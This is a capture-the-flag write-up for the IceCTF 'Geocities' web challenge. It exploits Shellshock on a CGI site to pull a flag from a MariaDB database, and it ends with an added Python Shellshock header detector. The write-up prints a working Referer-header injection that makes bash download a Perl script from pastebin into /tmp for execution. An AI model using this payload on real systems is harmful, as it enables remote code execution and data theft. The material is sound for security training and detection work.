[IceCTF] Geocities – Web100

Chall:

I recently stumbled onto this old http://geocities.vuln.icec.tf/ site, it’s a miracle that it’s still up! It must be running some ancient technology and probably hasn’t been updated in years, it’s our lucky day boys!

Messing around and thinking about the description:

It must be running some ancient technology and probably hasn't been updated in years

So I decided to look for vulnerabilities that were popular 1-2 years ago, and found it. It's SHELLSHOCK!

You can click here for more info about Shellshock.

Let's test this:

At first I thought the flag was somewhere on the server, so I tried to find it with

grep -r IceCTF *

and nothing appeared!

So I read some of the source to find something useful, and noticed that maybe the Perl file get_posts.pl is a hint:

#!/usr/bin/perl

use strict;
use warnings;
use DBI;

# Connect to the MariaDB instance; the credentials are hard-coded in the script.
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

# Fetch every post, newest first.
my $sth = $dbh->prepare("SELECT * from Posts ORDER BY post_date DESC");
$sth->execute();

# Print columns 1..3 of each row, separated by semicolons.
while (my $row = $sth->fetchrow_arrayref()) {
    print "$row->[1];$row->[2];$row->[3]\n";
}

$sth->finish();
$dbh->disconnect();

Well well, maybe the flag is in the database.

Also, we can execute Perl scripts directly:

Okay, let's create a new .pl file that extracts the information from the database for us, and place it in /tmp/, where we are allowed to create and execute it.

Here is the final payload:

http://pastebin.com/raw/g5E5YXqt

And download it:

Referer: () { :; }; echo -e "Content-Type: text/plain\n";   /bin/bash -c "wget http://pastebin.com/raw/g5E5YXqt -O /tmp/tsu.pl";

Time to get the flag!
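As an added defensive example (not part of the original writeup), here is a small Python detector for the kind of request used above: it parses a raw HTTP request, maps each header to the HTTP_* environment variable a CGI server would export, and flags any value that starts with the `() {` function-export prefix an unpatched bash parsed. The host name, the /cgi-bin/ path and both sample requests are constructed for the example.

```python
import re
from typing import Dict, List

# Shellshock: an unpatched bash imported any environment variable whose value
# began with "() {" as a function definition and kept parsing past the closing
# brace, executing whatever followed. This prefix is what the detector checks.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Constructed sample requests (not captured traffic). The second one carries
# the classic harmless Shellshock probe string in its Referer header.
BENIGN_REQUEST = (
    "GET /cgi-bin/get_posts.pl HTTP/1.1\r\n"
    "Host: geocities.example.invalid\r\n"
    "Referer: http://geocities.example.invalid/index.html\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)
PROBE_REQUEST = (
    "GET /cgi-bin/get_posts.pl HTTP/1.1\r\n"
    "Host: geocities.example.invalid\r\n"
    "Referer: () { :; }; echo vulnerable\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP/1.x request into its header name/value pairs."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]          # drop the request line
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip()] = value.strip()
    return headers

def cgi_env_name(header: str) -> str:
    """CGI exports a request header as HTTP_<NAME>; Referer -> HTTP_REFERER."""
    return "HTTP_" + header.upper().replace("-", "_")

def find_shellshock_headers(raw_request: str) -> List[str]:
    """Return the CGI variable names an unpatched bash would have parsed as
    function definitions, i.e. the headers a Shellshock alert should cite."""
    return [cgi_env_name(n) for n, v in parse_headers(raw_request).items()
            if SHELLSHOCK_PREFIX.match(v)]

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("probe", PROBE_REQUEST)):
        print(label, find_shellshock_headers(req))
```

The same check applied to every header (not just Referer) is what a WAF or log-scanning rule needs, since any header the CGI exports reaches bash the same way.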
